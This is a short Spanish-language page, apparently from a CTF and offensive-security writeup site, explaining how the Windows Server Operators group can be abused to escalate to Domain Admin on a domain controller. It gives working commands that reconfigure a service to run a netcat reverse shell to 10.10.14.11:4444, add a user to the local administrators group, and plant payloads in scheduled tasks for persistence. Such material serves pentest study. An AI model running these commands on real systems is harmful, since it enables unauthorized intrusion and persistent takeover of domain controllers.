Zona Hacking — Writeups de CTFs y Seguridad Ofensiva

Es un grupo built-in en los controladores de dominio (DC) que tiene privilegios para administrar servidores, pero no es un grupo administrativo a nivel dominio como Domain Admins.

Sin embargo, si el DC es el único “servidor” en el entorno, este grupo puede ser la puerta directa para escalar a Domain Admin.

Privilegios que tiene por defecto

Un miembro de Server Operators puede hacer lo siguiente en un Domain Controller:

Reiniciar o apagar el sistema
Cargar y descargar driver
Realizar backups y restores
Iniciar/Detener servicios
Conectarse vía RDP
Escribir en C:\Windows\Tasks

Explotación

Abuso de privilegios de servicios

sc.exe config someService binPath= "C:\temp\nc.exe -e cmd 10.10.14.11 4444"
sc.exe stop someService
sc.exe start someService

Agregarte a Administradores Locales del DC

Ya que podemos escribir sobre el servicio o hacer RDP, podemos ejecutarte como NT AUTHORITY\SYSTEM y:

net localgroup administrators hacker /add

Meter payloads en tareas programadas (Scheduled Tasks)

Podemos escribir en C:\Windows\Tasks, lo que se puede usar para ejecución diferida o persistencia.

Server Operators Server Operators

Privilegios que tiene por defecto

Explotación

Abuso de privilegios de servicios

Agregarte a Administradores Locales del DC

Meter payloads en tareas programadas (Scheduled Tasks)

Server Operators